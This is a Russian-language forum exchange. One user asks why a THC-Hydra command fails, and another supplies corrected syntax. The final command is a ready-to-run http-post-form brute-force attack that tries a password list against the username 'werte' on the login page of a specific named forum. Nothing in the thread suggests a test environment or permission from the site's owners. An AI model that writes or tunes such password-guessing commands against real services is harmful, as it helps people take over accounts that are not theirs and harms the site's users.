Сообщение от
Gianni
прописал в cmd.exe следующие:
cmd/k C:\-0-0-0-\hydra-5.4-win\hydra-5.4-win\hydra -l werte -P pas.txt -f forum.e-fans.net/login.php?sid=83e176f96b1fa50d8126543ee2120b47 http
выдаёт следующий error:
Error: The service http has been replaced with http-head и http-get. Same for htpps.
не подскажите что делаю не так.
http[s]-{head|get}
specifies the page to authentication at (REQUIRED)
Value can be "/secret" or "http://bla.com/foo/bar" or
"https://test.com:8080/members"
http[s]-form-{get|post}
specifies the page and the parameters for the web form.
the keyword "^USER^" is replaced with the login and
^PASS^ with the password.
syntax: <url>:<form parameters>:<failure string>
e.g.: /login.php:user=^USER^&pass=^PASS^&mid=123:incorrec t
допустим так:
Код:
hydra -l user -p qwetry www.xxx.ru http-get-form /login.php:user=^USER^&pass=^PASS^:fuck!
или
Код:
hydra -l user -p qwetry http://www.xxx.ru http-get /login.php
или
Код:
hydra -l user -p qwetry http://www.xxx.ru http-head /login.php
а в твоем случае будет так:
Код:
hydra -l werte -P pas.txt forum.e-fans.net http-post-form /login.php?sid=83e176f96b1fa50d8126543ee2120b47:username=^USER^&password=^PASS^&login=Log+in:"invalid password"